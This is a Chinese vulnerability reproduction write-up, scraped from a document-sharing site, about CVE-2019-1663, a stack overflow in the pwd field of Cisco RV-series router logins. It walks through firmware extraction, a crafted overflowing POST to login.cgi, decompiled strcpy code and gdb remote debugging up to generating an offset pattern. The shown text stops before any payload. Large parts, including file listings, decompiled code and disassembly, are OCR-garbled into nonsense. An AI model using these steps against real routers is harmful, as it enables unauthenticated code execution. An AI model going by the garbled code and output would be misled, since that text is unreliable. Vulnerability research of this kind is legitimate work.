（CVE-2019-1663）Cisco 堆栈缓冲区溢出漏洞.docx

《（CVE-2019-1663）Cisco 堆栈缓冲区溢出漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2019-1663）Cisco 堆栈缓冲区溢出漏洞.docx（13页珍藏版）》请在优知文库上搜索。

1、(CVE-2019-1663)堆栈缓冲区溢出漏洞一、漏洞简介CVE-2019-1663是一个影响Cisco的多个低端设备的堆栈缓冲区，由于管理界面没 有对登录表单的pwd字段进行严格的过滤，底层在处理请求时，Strcpy函数导致 堆栈溢出，未经身份验证的远程攻击者可以在设备上执行任意代码二、漏洞影响Cisco RVllOW 1.2.1.7 Cisco RV130RV130W 1.0.3.45 Cisco RV215W 1.3.0.8三、复现过程OxOl固件提取这里我使用时Cisco RV130W 1.0.3.44进行测试的，binwalk对固件进行提取可以看出文件系统是SqUaShfS,并且是

2、小端存储方式,得到一个类Linux目录totnwrcIbtn dm IH 2, 6t , , 81, -a 8lw? t-a-, H一, tner IMe , nta-. Ctcr f f, 1 ， bl”， KU ,八S file ru file HW n nu file me ftle Hie file ru ftu n ftl TUe file m file nu “ n n nuSLdCwtcM sbi*rc tcheSytn/O0mssl 2td wrtbtnrp Rtch* v*lntrtRH Mtcht ur/btn/tftM Mtch wtrsbntfcH zths usrsb

3、lwebroot matches Sfes7gnJf J 5C 33GWH3PS watches KCJs7tk7y Atche usr*btndhcllet tches vt fMtct wittincurl *41cM usrtetnjsorte Fetches usrsbtnl2tM Mtches usr/sbln/cal natchsU“八IwIIXSso4.1, Mtchs Msryltb八tbuq.l.d fetches vfrtbUbn*tMp.so.lS Mtchs w*rllbltbcry*to.*o.t. ZtCh， uftlbUttl.M. 11. *4tce U“八tb

4、八tbZ，M.s。Atcs VSf ltb 4r. tc RAtMS (ttn) any later versto. See .Z2 - :w.wes*n85 ”r ”“I 1”J根据之前分析的多个嵌入式设备的经验，猜测这个可能就是处理http请求的底层 文件0x03漏洞分析对Web登录界面的Iogin.cgi发送如下的PC)ST请求POST /login.Cgi HTTP/1.1Host: 10.10.10.2User-Agent: Mozilla/5.0 (Xll; Linux x86_64; rv:60.0) Gecko/20100101 Fir efox/60.0Accept: tex

5、thtmljapplicationxhtml+xml,applicationmljq=0.9j*jq=0.8Accept-Language: en-US,enjq=0.5Accept-Encoding: gzip, deflateReferer: https:/10.10.10.2/Content-Type: application/x-www-form-urlencodedContent-Length: 137Connection: closeUpgrade-Insecure-Requests: 1submit_button=login&submit_type=&gui_action=&wa

6、it_time=0&change_action= &enc=l&user=cisco&pwd=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&Se1_1ang=EN这里向pwd发送32字节的值，对登录界面的http处理请求在IDA中的是 sub.2C614Q,地址是 0x0002C614vl3 atoi(vl2);sprintf(v67j w%d,j + 1);nvram_set(wdefault_loginM &byte_899D8);vl4 = sub_lD170(int)MuserM);if ( ! vl4)vl5 =v36 = (char r)vl4;if ( !vl

7、4 )v36 V15；vl6 = sub-lD17e(int)pwd);IVR7 = (char X)VI6;if ( Ivl6 )vl7 =;if ( !vl6 )v37 = vl7;nptr = (char *)sub-lD170(int)enc);if ( Inptr )nptr = (char *)&word 89A4C;if ( !post )SUbjLCFB4(35);v25 sub_lD170(int)MuserM);if ( !v25i)v26 = mh;v36 = (char *)v25;if ( Iv25 )v36 v26;v27 = sub-lD170( ( int) ,

8、pwd m );37 = (char *);if ( !v27 )v28 =,;if ( !v27 )v37 = v28;nptr = (char )sub_lD170(int)encM);if ( !nptr )nptr = (char )&word_89A4C;函数将POST请求的参数进行解析，存储到.bss段 OGeAea7 DC8 0x69 ; ie .bssA9C18 DCB GxbF , Oa .bA8(19 DCB 6E ; n bss：e(MA8ClADCB* * bsszA8(lBDCB,.bss(XMA81l AEnjl DCB eence,e bss 0A3(20 al_

9、l DCB .广，0e Lbss：eoeA8C22 MBOCB wuserw,0,I btrS：eoeAM27 KiscowI DCB cisco,ejnPwd DCB pwd,eF831e5dll99e4_l DCB aAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwtO# I bs; (KK巾； aSelLang- D(B sel-lang,bss OA8CS8aEn-DCB EN,0# i bsseA8(5eDCB# .bs0eA8C5FDCB# LbeeeaAaceeOCBe然后，将PWd参数的值从.bss段中提取，调用StrCPy将值存到动态分配的内存中“xt:Me

10、K2S8text:WX2M IoCgSt txtcMeX2M KNm, K9CeXt eWX 25( MOV t7CeXtMeX264 text ：MeX264 Ioc 2064text eK2M LM tmx冰 LCM tcvtreeK27 CHP tt M9X274 BNf teMtMejs text Mex27S Ioc. textM27S tw* MMX77S mu. I63*1. (U)l set architecture arm 确定要调试的是arm架构gef set follow-fork-mode child 确定调试的进程gef set solib-search-path h

11、omeclbliotfirmware/cisco/_RV130.bin.ext ractedsquashfs-rootlib 加载要用到的 lib 文件gef file /home/clb/liot/firmware/cisco/_RV130.bin.extracted/squashfs-r oot/usr/sbin/httpd 加载调试文件gef target remote 10.10.10.2:1234 与远程建立连接已经建立调试连接，可以进行调试了查找溢出的位置，使用pattern生成512个字符串gef patter create 512+ Generating a pattern of 512 bytesaaaabaaacaaadaaaeaaafaaagaaahaaaiaaaJaaakaaalaaamaaanaaaoaaapaaaqaaaraa asaaataaauaaavaaawaaaxaaayaaazaabbaab